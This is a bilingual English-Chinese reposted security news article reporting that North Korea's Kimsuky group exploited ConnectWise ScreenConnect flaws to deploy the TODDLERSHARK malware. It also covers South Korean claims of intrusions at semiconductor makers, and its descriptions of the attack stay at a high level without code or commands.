朝鲜黑客利用漏洞传播新型TODDLERSHARK恶意软件

North Korean threat actors have exploited the recently disclosed security flaws in ConnectWise ScreenConnect to deploy a new malware called TODDLERSHARK.

北朝鲜威胁行为者利用最近公开的ConnectWise ScreenConnect安全漏洞部署了一个名为TODDLERSHARK的新恶意软件。

According to a report shared by Kroll with The Hacker News, TODDLERSHARK overlaps with known Kimsuky malware such as BabyShark and ReconShark.

根据Kroll与The Hacker News分享的一份报告，TODDLERSHARK与已知的Kimsuky恶意软件（如BabyShark和ReconShark）重叠。

"The threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application," security researchers Keith Wojcieszek, George Glass, and Dave Truman said.

"威胁行为者通过利用ScreenConnect应用程序暴露的安装向导获得了对受害者工作站的访问，"安全研究人员Keith Wojcieszek，George Glass和Dave Truman说。

"They then leveraged their now 'hands on keyboard' access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware."

"然后，他们利用现在的'键盘操作'访问使用cmd.exe执行mshta.exe并携带Visual Basic（VB）基础恶意软件的URL。"

The ConnectWise flaws in question are CVE-2024-1708 and CVE-2024-1709, which came to light last month and have since come under heavy exploitation by multiple threat actors to deliver cryptocurrency miners, ransomware, remote access trojans, and stealer malware.

相关的ConnectWise漏洞是CVE-2024-1708和CVE-2024-1709，上个月曝光，此后已被多个威胁行为者大量利用，以传送加密货币挖矿器，勒索软件，远程访问木马和窃取者恶意软件。

Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the most recent being GoBear and Troll Stealer.

Kimsuky，又称APT43，ARCHIPELAGO，Black Banshee，Emerald Sleet（以前是Thallium），KTA082，Nickel Kimball和Velvet Chollima，不断扩展其恶意软件库存，最近的新工具包括GoBear和Troll Stealer。

BabyShark, first discovered in late 2018, is launched using an HTML Application (HTA) file. Once launched, the VB script malware exfiltrates system information to a command-and-control (C2) server, maintains persistence on the system, and awaits further instruction from the operator.

BabyShark，2018年底首次发现，使用HTML应用程序（HTA）文件启动。启动后，VB脚本恶意软件将系统信息传送到命令和控制（C2）服务器，保持系统上的持久性，并等待操作员的进一步指示。

Then in May 2023, a variant of BabyShark dubbed ReconShark was observed being delivered to specifically targeted individuals through spear-phishing emails. TODDLERSHARK is assessed to be the latest evolution of the same malware due to code and behavioral similarities.

然后在2023年5月，BabyShark的变种ReconShark被观察到通过针对特定个人的钓鱼邮件传送。由于代码和行为相似性，TODDLERSHARK被认为是相同恶意软件的最新演变。

The malware, besides using a scheduled task for persistence, is engineered to capture and exfiltrate sensitive information about the compromised hosts, thereby acting as a valuable reconnaissance tool.

该恶意软件除了使用计划任务以保持持久性外，还被设计为捕获和传送有关受损主机的敏感信息，从而成为有价值的侦察工具。

TODDLERSHARK "exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generate C2 URLs, which could make this malware hard to detect in some environments," the researchers said.

研究人员表示，TODDLERSHARK“展示了多态行为元素，即通过更改代码中的标识字符串，通过生成的垃圾代码更改代码位置，以及使用独特生成的C2 URL，这可能使该恶意软件在某些环境中难以检测。”。

The development comes as South Korea's National Intelligence Service (NIS) accused its northern counterpart of allegedly compromising the servers of two domestic (and unnamed) semiconductor manufacturers and pilfering valuable data.

这一发展发生在韩国国家情报院（NIS）指控其北方对手据称侵入了两家国内（未具名）半导体制造商的服务器并窃取了有价值的数据之际。

The digital intrusions took place in December 2023 and February 2024. The threat actors are said to have targeted internet-exposed and vulnerable servers to gain initial access, subsequently leveraging living-off-the-land (LotL) techniques rather than dropping malware in order to better evade detection.

数字入侵发生在2023年12月和2024年2月。据说威胁行为者针对互联网暴露和易受攻击的服务器以获取初始访问权限，随后利用与生活中的土地（LotL）技术相比丢弃恶意软件以更好地逃避检测。

"North Korea may have begun preparations for its own production of semiconductors due to difficulties in procuring semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles," NIS said.

“由于对朝鲜实施制裁和由于发展卫星导弹等武器而导致难以获得半导体，朝鲜可能已经开始为自己生产半导体做准备。”NIS说。

---

参考资料

[1]https://thehackernews.com/2024/03/hackers-exploit-connectwise.html

原文始发于微信公众号（知机安全）：朝鲜黑客利用漏洞传播新型TODDLERSHARK恶意软件